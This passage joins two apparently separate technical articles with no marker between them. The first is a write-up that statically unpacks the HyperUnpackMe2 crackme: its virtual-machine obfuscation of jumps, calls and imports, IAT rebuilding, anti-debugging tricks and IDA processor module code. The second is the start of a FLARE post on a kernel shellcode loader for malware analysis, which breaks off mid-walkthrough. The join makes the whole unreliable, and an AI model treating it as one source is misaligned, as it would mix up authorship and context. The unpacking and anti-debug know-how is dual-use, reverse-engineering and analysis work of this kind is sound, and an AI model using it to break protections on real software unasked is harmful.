Then, when we see one of these arbitrary displacements, we can map it to a location in the original binary by looking for the greatest lower bound in the set of displacements. I.e. for displacement C0h, this is +9h into the function with displacement B7h, and is therefore at the address 1001EEFh + 9h. Here’s an example:

    ROM:01049920    getmem  r0B, 10000h
    ROM:01049926    mov     r0B, [r0B]
    ROM:0104992A    add     r0B, 639h    ; where does this point?

 

 4.2 Long Jump Obfuscation

 

    .text:010019DF E9 00 00 00 00                    jmp     $+5

Here we see, in the x86 IDB, an example of the jmp obfuscation. What actually happens here, at runtime, is that a chunk of memory is allocated, and gets filled with what looks like API thunk functions. The jmps in the binary are patched to jmp into the allocated memory, which subsequently jmps to the correct location in the binary. The following VM code illustrates this:

    ROM:0104840F    valloc  195h, 6       ; allocate 0x195 bytes of vmem under the
    ROM:01048418    getmem  r0E, 6        ; tag 0x6
                    
    ROM:0104841E    mov     r0F, 10019DFh ; see above:  same address
    ROM:01048426    mov     r0D, r0F
    ROM:0104842A    add     r0D, 5        ; point after the jump
    ROM:01048432    mov     r09, r0E      ; point at the currently-assembling stub
    ROM:01048436    sub     r09, r0D      ; calculate the displacement for the jmp
    ROM:0104843A    inc     r0F           ; point to the 0 dword in e9 00000000
    ROM:0104843D    mov     [r0F], r09    ; insert reference to allocated memory
    ROM:01048441    mov     r0B, 1001AE1h ; this is the target of the jmp
    ROM:01048449    mov     r0C, r0E
    ROM:0104844D    add     r0C, 5        ; calculate address after allocated jmp
    ROM:01048455    sub     r0B, r0C      ; calculate displacement for jmp
    ROM:01048459    mov     [r0Eb], 0E9h  ; build jmp in VirtualAlloc'ed memory
    ROM:0104845E    inc     r0E
    ROM:01048461    mov     [r0E], r0B    ; insert address into jmp
    ROM:01048465    add     r0E, 4

This is the general code sequence used to fix up the jumps when the function to be fixed up remains in the original binary’s sections. When the function has been copied into memory, as described in the previous section, the code changes slightly: r0F and r0B’s addresses are the displacements described previously. For example, the code at -41E and -441 are replaced with these snippets, respectively:

    ROM:010498F3    getmem  r0F, 10000h
    ROM:010498F9    mov     r0F, [r0F]
    ROM:010498FD    add     r0F, 469h
    
    ROM:01049920    getmem  r0B, 10000h
    ROM:01049926    mov     r0B, [r0B]
    ROM:0104992A    add     r0B, 639h

Given the sequences above, and making use of the stolen address -> real address mapping, it’s trivial to cut out the middleman and insert the proper displacements into the correct dword locations. In the code above, we retrieve the dword operands from -41E and -441 and simply fix the jumps ourselves.

 4.3 Calls-To Obfuscation

These are handled in a very similar fashion as the jump obfuscation: the code to fix up the calls-to references is exactly the same as the jump obfuscation fixups. The calls also go through stubs in allocated memory which jmp to their proper destinations.

    .text:01001C51 6A 00             push    0
    .text:01001C53 E8 00 00 00 00    call    $+5
    .text:01001C58 C2 1C 00          retn    1Ch
    
    ROM:0104419A    valloc  3F2h, 5       ; allocate 0x3f2 bytes of memory under
    ROM:010441A3    getmem  r0E, 5        ; the tag 0x5
    
    ROM:010441A9    mov     r0F, 1001C53h ; address of call to be fixed up (above)
    ROM:010441B1    mov     r0D, r0F
    ROM:010441B5    add     r0D, 5        ; point after the call
    ROM:010441BD    mov     r09, r0E      ; r09 points to the allocated jmp stub
    ROM:010441C1    sub     r09, r0D
    ROM:010441C5    inc     r0F
    ROM:010441C8    mov     [r0F], r09    ; insert the proper displacement
    ROM:010441CC    mov     r0B, 1001B9Ah ; we would be calling this address
    ROM:010441D4    mov     r0C, r0E
    ROM:010441D8    add     r0C, 5
    ROM:010441E0    sub     r0B, r0C      ; calculate displacement
    ROM:010441E4    mov     [r0Eb], 0E9h  ; form the long jmp in allocated memory
    ROM:010441E9    inc     r0E
    ROM:010441EC    mov     [r0E], r0B
    ROM:010441F0    add     r0E, 4

Notice that, in this case, a call from a non-stolen function is being fixed up to call a non-stolen function: the addresses on lines -1A9 and -1CC are hard-coded within the binary. When a call in a stolen function is fixed up to call another function, the beginning of the above code sequence is different: it uses the getmem idiom, as we saw previously. The code at -1A9 becomes:

    ROM:010441F8    getmem  r0F, 10000h
    ROM:010441FE    mov     r0F, [r0F]
    ROM:01044202    add     r0F, 20Dh

However, the destination address is not loaded via getmem, because as we saw previously, calls to stolen functions are routed to their destinations via these jumps. I.e. calls to stolen functions behave just like calls to the original functions.

Recovering the proper displacement from the caller to the callee is as simple as it was for the jumps, because the code is identical, so see the closing remarks for the last section on how to fix up these calls.

 4.4 Import Obfuscation

Here’s a sample of the import redirection. Instead of referencing the imports directly, the jmp/call-to-import instructions are patched to reference locations such as these:

    TheHyper:01021524    pushf
    TheHyper:01021525    pusha
    TheHyper:01021526    call    sub_1021548
    
    TheHyper:01021548    pop     eax
    TheHyper:01021549    add     eax, 16h
    TheHyper:0102154C    jmp     eax

This sort of thing goes on for a while (six layers for this one) with some random junked garbage interspersed before eventually redirecting control to the original import:

    TheHyper:010215DE 61                popa
    TheHyper:010215DF 9D                popf
    TheHyper:010215E0 E9 00 00 00 00    jmp     $+5

4.4.1 IAT Reconstruction

Believe it or not, the first thing that HyperUnpackMe2 does when it really gets down to business is to correctly rebuild the original IAT.

First, the DLL names are retrieved from memory byte-by-byte. The names are not stored contiguously, but rather, the bytes corresponding to the DLL names are randomly mixed together. The DLL is then LoadLibraryA’d.

    ROM:01026058    mov     r04, 1013000h  ; point to beginning of packer section
    ROM:0102607B    getmem  r05, dword_101382D
    ROM:01026081    mov     r0B, r09
    ROM:01026085    mov     r06, r04
    ROM:01026089    add     r06, 41Ch
    ROM:01026091    mov     [r0Bb], [r06b] ; copy byte of DLL name from 0x101341c
    ROM:01026095    inc     r0B
    ROM:01026098    mov     r06, r04
    ROM:0102609C    add     r06, 93h
    ROM:010260A4    mov     [r0Bb], [r06b] ; copy byte of DLL name from 0x1013093
    
    ; idiom repeats a variable number of times
    
    ROM:010260A8    inc     r0B
    ROM:0102617C    mov     [r0Bb], 0
    ROM:01026181    push    r09
    ROM:01026184    x86call r0C                 ; LoadLibraryA
    ROM:01026186    add     rESP, 4

Next, the entire DLL’s address space is copied into a freshly-allocated chunk of memory. Yes, you read that right. The DLL’s SizeOfImage is used as the size parameter to VirtualAlloc, and then the entire DLL is memcpy’d into it the result. This is responsible for a huge bloat in the memory footprint. I didn’t think that this trick would work, but the crackme does run, after all. Personal correspondence with TheHyper reveals that this is why the crackme only runs on XP SP2 (although I haven’t investigated why — help me out here, Alex?).

The following code illustrates the process:

    ROM:0102618E    push    r09
    ROM:01026191    push    r0B
    ROM:01026194    push    r0D
    ROM:01026197    mov     r09, r0A
    ROM:0102619B    getmem  r0A, g_Copy_Of_Kernel32_Address_Space
    ROM:010261A1    mov     r0A, [r0A]
    ROM:010261A5    push    kernel32_hashes_VirtualAlloc
    ROM:010261AB    push    r0A
    ROM:010261AE    vmcall  API__GetProcAddress
    ROM:010261B4    mov     r0D, r0A
    ROM:010261B8    mov     r0B, r09
    ROM:010261BC    add     r0B, 3Ch
    ROM:010261C4    mov     r0B, [r0B]
    ROM:010261C8    add     r0B, r09
    ROM:010261CC    add     r0B, 50h
    ROM:010261D4    mov     r0B, [r0B]          ; retrieve this DLL's SizeOfImage
    ROM:010261D8    push    40h
    ROM:010261DE    push    1000h
    ROM:010261E4    push    r0B
    ROM:010261E7    push    0
    ROM:010261ED    x86call r0D                 ; allocate that much memory
    ROM:010261EF    add     rESP, 10h
    ROM:010261F7    mov     r03, r0A
    ROM:010261FB    mov     [r05], r0A
    ROM:010261FF    push    r0B
    ROM:01026202    push    r09
    ROM:01026205    push    r0A
    ROM:01026208    x86call x86_memcpy          ; copy DLL's address space
    ROM:0102620E    add     rESP, 0Ch
    ROM:01026216    pop     r0D
    ROM:01026219    pop     r0B
    ROM:0102621C    pop     r09

Next, the imported APIs are loaded, but not in the normal way. The protector includes a VM-function that I’ve called API__GetProcAddress, which takes a pseudo-HMODULE and a shellcode-like API hash as arguments. The pseudo-HMODULE is the address of the memory that the DLL was copied into above. Thus, the addresses returned by this function reside in the copied DLL bodies, and not the originals.

API__GetProcAddress works by iterating through the DLL’s exports and hashing each function’s name, stopping when it finds the corresponding hash that was passed in as an argument. It then returns the address of that function.

This makes it harder for dynamic tools to identify which APIs are actually being used: after all, the API addresses are not contained within a loaded module.

The hashes and their locations in the original IAT are retrieved from the jumble of data at the beginning of the packer section in a similar fashion as the assembling of the DLL names. Additionally, the address at which the resolved import belongs in the original IAT entries is also assembled from scattered data.

    ROM:0102621F    xor     r07, r07    ; r07 = hash
    ROM:01026223    mov     r06, r04
    ROM:01026227    add     r06, 12h
    ROM:0102622F    mov     r05, [r06]
    ROM:01026233    and     r05, 0FFh
    ROM:0102623B    or      r07, r05    ; get a single byte of the hash
    ROM:0102623F    ror     r07, 8
    
    ; idiom repeats three times
    
    ROM:010262B3    xor     r08, r08    ; r08 = where to put the resolved import
    ROM:010262B7    mov     r06, r04
    ROM:010262BB    add     r06, 5C7h
    ROM:010262C3    mov     r05, [r06]
    ROM:010262C7    and     r05, 0FFh
    ROM:010262CF    or      r08, r05
    ROM:010262D3    ror     r08, 8
    
    ; idiom repeats three times
    
    ROM:01026347    push    r07
    ROM:0102634A    push    r03         ; point at copied DLL
    ROM:0102634D    vmcall  API__GetProcAddress
    ROM:01026353    add     r08, 1000000h
    ROM:0102635B    mov     [r08], r0A  ; store resolved address back into IAT

The DLL names, hashes, and IAT addresses can all be recovered with no difficulties, and we can ignore the DLLs being copied into dynamically allocated memory. It’s a simple matter to reverse the hashes into API names. Therefore, the entirety of the import information can be reconstructed statically: we can simply mimic what the packer itself does, rebuild the IDTs/IATs with no difficulties, and then point the imports directory pointer in the PE header to our rebuilt structures.

I was anticipating things would be harder than they turned out to be, so I decided to move the FirstThunk lists (into which the original import references were made) instead of keeping them at their original addresses. This turned out to be an unnecessary mistake that complicates some of what follows. I apologize.

In order to rectify this situation, I kept a map from the old IAT addresses into the new IATs that I created.

For example:

    .text:010012A0    __imp__PageSetupDlgW@4 dd 0

    010012A0 -> [Address of new FirstThunk entry for PageSetupDlgW import]

4.4.2 IAT Redirection

The next thing that happens is that the addresses which were resolved in the previous section are inserted into API-obfuscating stubs described in 4.4, and the addresses of these API-obfuscating stub functions are inserted into the IAT atop the import addresses.

    .text:010012A0    ; BOOL __stdcall PageSetupDlgW(LPPAGESETUPDLGW)
    .text:010012A0    __imp__PageSetupDlgW@4 dd 0
    
    TheHyper:01014126    pushf              
    TheHyper:01014127    pusha              
    TheHyper:01014128    call    sub_1014150 ; eventually ends up at next snippet
                                                                           
    TheHyper:0101423A    popa                       
    TheHyper:0101423B    popf                       
    TheHyper:0101423C    jmp     near ptr 0B97002DDh ; patch here + 1 byte
    
    ROM:0103659A    mov     r0B, 10012A0h ; see above:  IAT addr
    ROM:010365A2    mov     r0E, 1014126h ; see above:  beginning of import obfs
    ROM:010365AA    mov     r08, 101423Dh ; see above:  end of import obfs
    ROM:010365B2    mov     r06, [r0B]
    ROM:010365B6    mov     [r0B], r0E    ; replace IAT addr with obfuscated addr
    ROM:010365BA    mov     r03, r08
    ROM:010365BE    dec     r03
    ROM:010365C1    add     r03, 5
    ROM:010365C9    sub     r06, r03
    ROM:010365CD    mov     [r08], r06    ; form relative jump to real import

This makes no difference to the static examiner, and does not require fixups.

4.4.3 Call Instruction Fixup

Next, the CALL instructions which reference the IAT are re-created as relatively-addressed instructions which reference the API-obfuscating stub functions. The instructions in the original binary were 0xFF 0x15 [direct address], the pre-fixup instructions are 0xCC 0x90 0x90 0x90 0x90 0x90, and the new instructions are 0xE8 [relative address] 0x90. As this operation requires one less byte than the original directly-addressed references, a NOP is needed for the remaining byte cavity.

    .text:010019D4    int     3    ; Trap to Debugger
    .text:010019D5    nop
    .text:010019D6    nop
    .text:010019D7    nop
    .text:010019D8    nop
    .text:010019D9    nop
    
    ROM:0103C747    mov     r03, 10019D4h ; address of the snippet above
    ROM:0103C74F    mov     r06, r03
    ROM:0103C753    add     r06, 5        ; point after call
    ROM:0103C75B    mov     [r03b], 0E8h  ; insert relative call
    ROM:0103C760    inc     r03
    ROM:0103C763    mov     r04, 100121Ch ; where we call to
    ROM:0103C76B    sub     r04, r06      ; create relative displacement
    ROM:0103C76F    mov     [r03], r04    ; insert relative address
    ROM:0103C773    add     r03, 4
    ROM:0103C77B    mov     [r03b], 90h   ; insert NOP in empty byte spot

As before, the idiom is slightly different for fixing the calls in stolen functions, in that r03 is fetched from memory instead of referenced directly. The code at -747 would become, for instance:

    ROM:0103C67E    getmem  r03, 10000h
    ROM:0103C684    mov     r03, [r03]
    ROM:0103C688    add     r03, 1318h

In order to fix these up, we retrieve the address of the call from -747, and the import destination from -763. We then manually insert the correct instruction which calls into this IAT slot. Actually, due to my previously-described mistake, we first run the IAT address through the old IAT slot -> new IAT slot map before fixing the instruction.

4.4.4 Mov Instruction Fixup

Next, instructions of the form mov reg32, [dword from IAT] are fixed up by the protector in the same fashion as in the previous section. They are relatively addressed to point directly to the obfuscated stubs (whose addresses are fetched out of the IAT), instead of the direct addressing that was present in the original binary. The registers involved in this process are ESI, EDI, EBP, EBX, and EAX.

Stop and think for a second. So far, we’ve made the assumption that all imports are functions, but this is not always true. The MSVC CRT contains references to two imported data items. Trying to run a data import through the import-obfuscating procedure is an incorrect transformation and will always result in a crash. This is an Achilles’ heel of this protection.

The mov-instruction fixup is accomplished in much the same way as the call-instruction fixups. There are several idioms: for stolen functions, for regular functions, for EAX versus the other registers (as the instruction for EAX is five bytes, while the others are six bytes). The EAX-references are assumed to point to data and are fixed up directly instead of relatively.

Once again, extracting this information from the code sequences is not difficult to do statically, and I think I’m starting to develop RSI so I’ll skip the details here.

4.4.5 IAT Zeroing

After all of the references are correctly fixed up, the import addresses in the IAT are no longer needed, and are zeroed. We can ignore this step.

 4.5 The Rest of the Protection

As is usual in unpacking tasks, we must set the original entrypoint field of the PE header to the real entrypoint. We scan the disassembly listing for the instruction ‘stop’ and then statically backtrace to find the value of r0A.

    ROM:01049F05    mov     r0A, 1006AE0h
    ROM:01049F0D    stop

Finally, the NumberOfRVAsAndSizes field of the PE header has been set to -1 in order to confuse OllyDbg, so we should set that back to 0x10, the default. And while we’re at it, reduce the raw and virtual sizes of the last section, reduce the SizeOfImage, and truncate the last section in the executable. The final executable is exactly 1kb larger than the copy of notepad.exe which ships with Windows XP SP2.

After making all of the above modifications, the binary runs properly. Success!

 5.0 Comments On The Protection

It took a lot of work to unpack this protector, but ultimately, the static solution was both obvious and straightforward. On the other hand, dynamic dumping of this protector would be difficult, although still feasible.

 5.1 Problems With The Protection

This protection has a few problems in the theoretical sense. For one, it requires disassembling the binary: considering that the IAT is zeroed, _every_ reference to the IAT must be accounted for; if not, the program will simply crash. For example, if a trivial packer which XORed the code section, but left the imports alone, was applied first, all references would be missed and the binary would have no hope of running. This could be assuaged by not zeroing the original IAT (but still applying fixups on those which can be found) so that any non-found references continue to work properly.

Another problem is, of course, that disassembly isn’t perfect, and you could end up with all sorts of bugs if you just blindly replace what you think is a reference to the IAT if it is instead just plain old data, for instance.

Another problem is functions which have merged tails. If a function with a shared exit path is stolen, there are going to be problems.

Another problem, discussed in a previous section, is the assumption that imports will always point to functions and not data. This a faulty assumption, and will cause many failures.

All of that being said, if one assumes perfect disassembly (which is possible manually via IDA and/or full debugging information) and allows a blacklist of imports which are data, then this is a working protection, one which I expect will be quite potent after a few generations. By no means is this a «fire and forget» packer like UPX, but it can be made to work on a case-by-case basis.

 Appendix A: Anti-Debugging Tricks

There are 53 anti-debug mechanisms and checks in the VM, 49 of which can be broken automatically with either a tiny IDC script patching the bytecode directly, or a small patch to the VM harness. Of the remaining four, there are two which I’ve never heard of before (although I don’t do this type of work often), so it’s worth checking it out in the IDB, but I won’t ruin the surprises here. I didn’t look too heavily into those which could be broken automatically, so some of those descriptions in the IDB may be incorrect.

You may notice conditional jump instructions in the IDB which don’t have their jump targets resolved, such as the following:

    ROM:01035E90    cmp     r07, 1
    ROM:01035E98    jz      77026DDFh

At first I figured my processor module was buggy, and that this instruction was supposed to transfer control to a keyed memory region which the processor module had failed to locate. After inspection of the raw bytecode and a close look at the relevant VM harness code, in fact, this instruction will move the VM EIP to the immediate value 0x77026DDF, which will cause a reading access violation or undefined behavior during the next VM cycle, depending upon whether that’s a valid address. Hence, jumps with unresolved targets are anti-debugging tricks. TheHyper confirmed this afterwards in private correspondence.

 Appendix B: IDA Processor Module Construction

The main difference between writing a simple disassembler and writing an IDA processor module is that, instead of printing the disassembly immediately and moving on to the next instruction, information about each individual instruction and operand must be retained for later analysis and display.

For example, according to this VM’s instruction encoding, 0x20 0x?[0-0xf] means «get flags into specified register». Whereas in a trivial disassembler one might write this:

    case 0x20:
        printf("%lx:  getefl %s\n", address, decode_register(next_byte & 0xf));
        return 2; // size of instruction

In an IDA processor module, one must write something like this (in ana.cpp):

    case 0x20:
        cmd.itype    = TH_getefl; // instruction code is TH_getefl; this comes
                                  // from an enumeration
        cmd.Op1.type = o_reg;     // operand 1 is register
        cmd.Op1.reg  = TH_Regnum(4, ua_next_byte() & 0xf); // get register num
        cmd.Op1.dtyp = dt_dword;  // register is dword size
        cmd.Op2.type = o_void;    // operands 2+ do not exist
        length = 2;               // instruction size is 2
        break;

TH_getefl is an element of an enum (ins.hpp), which in turn has a text representation and flags (ins.cpp). The operand information is eventually retrieved and printed (out.cpp):

    case o_reg:
        OutReg( x.reg );
        break;

Clearly, writing an IDA processor module is a significant amount of work compared to writing a simple disassembler, and in the case of small portions of straight-line VM code, the latter approach (via IDC) is preferable. However, in the case of large amounts of VM code with non-trivial control flow structure, the traditional advantages of IDA (cross-reference tracking, comment-ability, ability to name locations, creation and application of structures, and the ability to run scripts and existing plugins) really begin to shine.

 B.1 Logical and Physical Divisions of an IDA Processor Module

It should be noted that, as with all C++ source code, physical divisions are irrelevant as long as all references can be resolved at link-time; however, the layout presented herein is consistent with the processor modules released in the IDA SDK, and also with the included processor module. Coincidentally, this information is laid out in the same order as specified by Ilfak in %idasdk%\readme.txt:

    "  Usually I write a new processor module in the following way:
            - copy the sample module files to a new directory
            - first I edit INS.CPP and INS.HPP files
            - write the analyser ana.cpp
            - then outputter
            - and emulator (you can start with an almost empty emulator)
            - and describe the processor & assembler, write the notify() function"

It should also be noted that I have written only one processor module and am not an expert on the subject. This information presented is correct as far as I am aware, but should not be considered authoritative. When in doubt, consult the processor module sources in the IDA SDK, inquire on the DataRescue forums, ask Ilfak, and buy the SDK support plan as a last resort.

 B.2 Assigning Each Mnemonic a Numeric Code and Textual Representation

The files herein are solely responsible for defining the opcodes used by the processor, their mnemonics specifically, in both numeric and textual forms.

B.2.1 Ins.hpp

This file contains an enum, called «nameNum» by Ilfak, which assigns each opcode to a number. This enum contains a special, unused leading entry ([processor]_null, set to zero), and a trailing entry ([processor]_last) denoting the beginning and the end of the enum.

    enum nameNum 
    {
      TH_null = 0,    // Unknown Operation
      TH_mov,         // Move                
      [...,]          // [more instructions here]
      TH_stop,        // Stop execution, return to x86
      TH_end          // No more instructions
    };

B.2.2 Ins.cpp

This file is the counterpart to the corresponding header file, which contains an array of instruc_t structures, which consist of a const char * (the mnemonic’s textual description) and a flags dword. The entries in this array correspond numerically to the values given in the enum. The flags specify the number of operands the instruction uses/changes, whether the instruction is a call/switch jump, and whether to continue disassembling after this instruction is encountered (e.g. return instructions and unconditional jumps do not generally transmit control flow to the following instruction).

    instruc_t Instructions[] = {
      { "",                     0             },  // Unknown Operation
      
      // GROUP 1:  Two-Operand Arithmetic Instructions
      { "mov" ,   CF_USE2 | CF_USE1 | CF_CHG1 },  // Move
      [{...,...},]                                // [more instructions]
      { "stop"   ,                    CF_STOP }   // Stop execution, return to x86
    
    };

 

 B.3 Assigning Each Register a Numeric Code and Textual Representation

B.3.1 Reg.hpp

This file contains an enum, whose real entries begin at 0 (unlike previously- described enums with a bogus leading entry), consisting of the legal registers supported by the processor. As IDA takes into account the concept of segmentation, you will need to define fake code and data segment registers if your processor does not use them.

    enum TH_regs
    {
        rESPb = 0,
        rESPw,
        rESP,
        [...,]
        r0F,
        rVcs, // fake registers for segmentation
        rVds, // fake
        rEND
    };

B.3.2 [Processor].hpp This file contains an array of const char *s which map the elements of the enum described in the previous subsection to a textual representation thereof.

    static char *TH_regnames[] =
    {
        "rESPb",
        "rESPw",
        "rESP",
        [...,]
        "r0F"
    };

 

 B.4 Analyzing an Instruction And Filling IDA’s «cmd» Structure

The main disassembler function in an IDA processor module is called int ana() and lives in ana.cpp. This function takes no parameters, and instead retrieves the relevant bytes to decode via the functions ua_next_byte(), _word(), and _long().

This function, or collection of functions as the case may be, is responsible for:

  • Setting cmd.itype to the correct value from the nameNum enum described in section B.2.1.
  • Setting the fields of cmd.Op[1-6] to describe the types of operands (registers, immediates, addresses, etc.) used by this instruction.
  • Returning the length of the instruction.

An example from the included processor module:

    case 0x1d:
        cmd.itype     = TH_vfree;       // virtualalloc'ed memory free 
        cmd.Op1.type  = o_imm;          // type of operand 1 is immediate
        cmd.Op1.value = ua_next_long(); // value = memory key to free
        cmd.Op1.dtyp  = dt_dword;       // 4-byte memory key
        length = 5;                     // 5 bytes, 1 for opcode, 4 for operand
        break;

The cmd structure ties together the functions described in the next two sections: these functions do not take arguments, and instead retrieve information from the cmd structure in order to perform their duties.

 B.5 Displaying Operands

Out.cpp is responsible for providing two functions, bool outop( op_t & ) and void out(). out() is responsible for outputting the mnemonic and deciding whether to output the operands.

There’s a bit of subtlety here: processors which use conditional execution, for example ARM and the instruction MOVEH, may have a single nameNum/Instructions entry for an opcode («MOV»), and the logic for prepending «-EH» to the mnemonic exists in out(). I have not encountered this while coding a processor module and cannot speak about it.

One thing to notice about the code below is how gl_comm is set to 1 every time out() is called. If you do not do this, you will not see comments in the disassembly. Figuring this required an email to Ilfak. Frankly, it’s puzzling why displaying comments is not the default behavior, but this is the reality, so be sure to set this variable.

    void out( void )
    {
        char buf[MAXSTR];
        init_output_buffer(buf, sizeof(buf));
        OutMnem();
        
        if( cmd.Op1.type != o_void )
            out_one_operand( 0 );    // output first operand
        
        if( cmd.Op2.type != o_void ) // do we have a second operand?
        {
            out_symbol( ',' );       // put a ", " in the output
            OutChar( ' ' );
            out_one_operand( 1 );    // output second operand
        }
        
        term_output_buffer();
    
        // attach a possible user-defined comment to this instruction
        gl_comm = 1;
                                              
        MakeLine( buf );
    }

The other function, bool outop(op_t &), is responsible for translating the contents of the op_t structure it is given into a textual description of that operand. The structure of this function is a simple switch statement on the op_t.type field. This function should be written concurrently with ana().

The output takes place through a number of functions exported from ua.hpp in the SDK: these functions tend to begin with «Out» or «out_» (out_register, OutValue, out_keyword, out_symbol, etc).

All in all, coding this function is mainly trivial. Here’s one of the more complicated operand types from the included processor module:

    case o_displ:
        out_symbol('[');
        OutReg( x.phrase );
        out_symbol('+');
        OutValue(x, OOF_ADDR );
        out_symbol(']');
        break;

 

 B.6 Creating Cross-References

Most, but not all, instructions implicitly transfer control flow to the next instruction, and create no other cross-references. Some instructions like «ret» and «jmp» do not reference the next instruction. Other instructions, like «call» and conditional jumps, create additional references to the address(es) targeted. Still other instructions create references to data variables specified by immediate values.

This knowledge is not inherent in the depiction of the instruction set which has been developed thus far, and must be specified programatically. This is the responsibility of the int emu() function, which resides in emu.cpp, the smallest .cpp file in the supplied processor module.

    int emu( void )
    {
      ulong Feature = cmd.get_canon_feature();
    
      if((Feature & CF_STOP) == 0) // does this instruction pass flow on?
          ua_add_cref( 0, cmd.ea+cmd.size, fl_F ); // yes -- add a regular flow
    
      if(Feature & CF_USE1) // does this instruction have a first operand?
          TouchArg(cmd.Op1, 0); // process it 
    
      if(Feature & CF_USE2)
          TouchArg(cmd.Op2, 1);
    
      return 1; // return value seems to be unimportant
    }
    
    // "emulation" performed on a given op_t, see emu()
    static void TouchArg( op_t &x, bool bRead )
    {
        switch( x.type )
        {
        case o_vmmem:
            ua_add_cref( 0, get_keyed_address(x.addr), 
                         InstrIsSet(cmd.itype, CF_CALL) ? fl_CN : fl_JN);
            // add a code reference to the targeted address, either a call or a 
            // jump depending on whether that instruc_t's flags has CF_CALL set.
            break;
        }
    }

 

 B.7 Declaring IDA’s Relevant Processor Module Structures

The bulk of what remains is the creation of structures which are directly or indirectly exported by the processor module.

B.7.1 asm_t Structure

This structure defines an «assembler» which determines what the disassembly listing should look like. Specifically, what the syntax is for declaring data, origins, section boundaries, comments, strings, etc.

Since we don’t need to re-assemble virtual machine code (in the case of VMs found in protectors), the choices made here are immaterial, and this structure can be created once and re-used for all VM processor modules.

B.7.2 Function Begin and End Sequences

Both of these are optional. IDA employs both a linear-sweep and a flow-following method of disassembly: on the first pass, it marks all entrypoints as code, and then scans the raw bytes looking for the function begin sequences (such as push ebp / mov ebp, esp). These sequences can be specified in the processor module; however, when dealing with a throwaway VM, they aren’t so important, because you’re unlikely to know a priori what a function prologue looks like.

B.7.3 Processor Notification Event Handler

This is where my ignorance of processor module construction is most transparent. This function is called by the kernel upon certain events being triggered; such events include closing the database, opening an existing IDB, creating a new IDB, changing the processor module type, creating a new segment, and so on. A complete list of events can be found in idp.hpp.

For the creation of this processor module, I did not need to utilize many processor events, so I did not explore this further.

B.7.4 processor_t Structure

This is the «main» structure employed by the processor module, as plugin_t is the main structure employed by a plugin. In this structure, the pieces gathered in the previous sections are stitched together.

The processor module must know:

  • The numeric ID of the processor module (custom-defined).
  • The long and short name of the processor module. I.e. metapc and pc respectively. There’s an important point here which isn’t documented: the makefile has a line called «DESCRIPTION» which MUST be in the format «[long name]:[short name]». Failure to ensure this means that the processor module will not be shown in the list of valid processor modules. Without knowing this, you’ll be mailing Ilfak for advice, like I did.
  • The assembler(s) available. We’ll only need the one we defined in B.7.1.
  • A function pointer to int ana() (see B.4).
  • A function pointer to int emu() (see B.6).
  • A function pointer to void out() and bool outop(op_t &) (see B.5).
  • A function pointer to int notify(processor_t::idp_notify, …) (see B.7.3).
  • The number of registers, and a pointer to the const char * array of register names (both laid out in B.3).
  • The function begin and end sequences described in B.7.2. We can set these to NULL.
  • The number of mnemonics, and a pointer to the instruc_t array of mnemonic names (both laid out in B.2).

 

 Appendix C: Obligatory Greets

TheHyper: Very innovative, good work! You keep making them, I’ll keep breaking them.

blorght and Zen: Two of my favorite people, with or without the charming accents. Way too talented and more than a step or two over the edge. Stay just the way you are: I love both of you.

Nicholas Brulez: My bro the PE killer 🙂 I hope we get to meet up again soon. I don’t have to tell you to keep kicking ass, mate.

Neural Noise: One of my best friends, and a very gracious host. I can’t wait to meet up again in the world’s most alluring mafia-run slum that is Napoli (what a crazy city!). You bring the beautiful women, and I’ll bring my bummy self, and we can have panic attacks in traffic waititng for the party to start ;-). Stay cool, man! 🙂

Solar Eclipse: Congrats on the Pietrek thing!

spoonm: Thanks for the crash space and the informed conversation, and I’m looking forward to see what you publish next, too.

Pedram: For being the modern-day Fravia of OpenRCE and editing this tripe.

Rossi: For the much-needed proofreading.

lin0xx: Calm down!

LeetNet, kw, and upb: Self-explanatory.

Skape: For uninformed and for rocking.

Finally, to all true friends everywhere: I couldn’t do it without you.

Loading Kernel Shellcode

In the wake of recent hacking tool dumps, the FLARE team saw a spike in malware samples detonating kernel shellcode. Although most samples can be analyzed statically, the FLARE team sometimes debugs these samples to confirm specific functionality. Debugging can be an efficient way to get around packing or obfuscation and quickly identify the structures, system routines, and processes that a kernel shellcode sample is accessing.

This post begins a series centered on kernel software analysis, and introduces a tool that uses a custom Windows kernel driver to load and execute Windows kernel shellcode. I’ll walk through a brief case study of some kernel shellcode, how to load shellcode with FLARE’s kernel shellcode loader, how to build your own copy, and how it works.

As always, only analyze malware in a safe environment such as a VM; never use tools such as a kernel shellcode loader on any system that you rely on to get your work done.

A Tale of Square Pegs and Round Holes

Depending upon how a shellcode sample is encountered, the analyst may not know whether it is meant to target user space or kernel space. A common triage step is to load the sample in a shellcode loader and debug it in user space. With kernel shellcode, this can have unexpected results such as the access violation in Figure 1.


Figure 1: Access violation from shellcode dereferencing null pointer

The kernel environment is a world apart from user mode: various registers take on different meanings and point to totally different structures. For instance, while the gs segment register in 64-bit Windows user mode points to the Thread Information Block (TIB) whose size is only 0x38 bytes, in kernel mode it points to the Processor Control Region (KPCR) which is much larger. In Figure 1 at address 0x2e07d9, the shellcode is attempting to access the IdtBase member of the KPCR, but because it is running in user mode, the value at offset 0x38 from the gs segment is null. This causes the next instruction to attempt to access invalid memory in the NULL page. What the code is trying to do doesn’t make sense in the user mode environment, and it has crashed as a result.

In contrast, kernel mode is a perfect fit. Figure 2 shows WinDbg’s dt command being used to display the _KPCR type defined within ntoskrnl.pdb, highlighting the field at offset 0x38 named IdtBase.


Figure 2: KPCR structure

Given the rest of the code in this sample, accessing the IdtBase field of the KPCR made perfect sense. Determining that this was kernel shellcode allowed me to quickly resolve the rest of my questions, but to confirm my findings, I wrote a kernel shellcode loader. Here’s what it looks like to use this tool to load a small, do-nothing piece of shellcode.

Using FLARE’s Kernel Shellcode Loader

I booted a target system with a kernel debugger and opened an administrative command prompt in the directory where I copied the shellcode loader (kscldr.exe). The shellcode loader expects to receive the name of the file on disk where the shellcode is located as its only argument. Figure 3 shows an example where I’ve used a hex editor to write the opcodes for the NOP (0x90) and RET (0xC3) instructions into a binary file and invoked kscldr.exe to pass that code to the kernel shellcode loader driver. I created my file using the Windows port of xxd that comes with Vim for Windows.


Figure 3: Using kscldr.exe to load kernel shellcode

The shellcode loader prompts with a security warning. After clicking yes, kscldr.exe installs its driver and uses it to execute the shellcode. The system is frozen at this point because the kernel driver has already issued its breakpoint and the kernel debugger is awaiting commands. Figure 4 shows WinDbg hitting the breakpoint and displaying the corresponding source code for kscldr.sys.


Figure 4: Breaking in kscldr.sys

From the breakpoint, I use WinDbg with source-level debugging to step and trace into the shellcode buffer. Figure 5 shows WinDbg’s disassembly of the buffer after doing this.


Figure 5: Tracing into and disassembling the shellcode

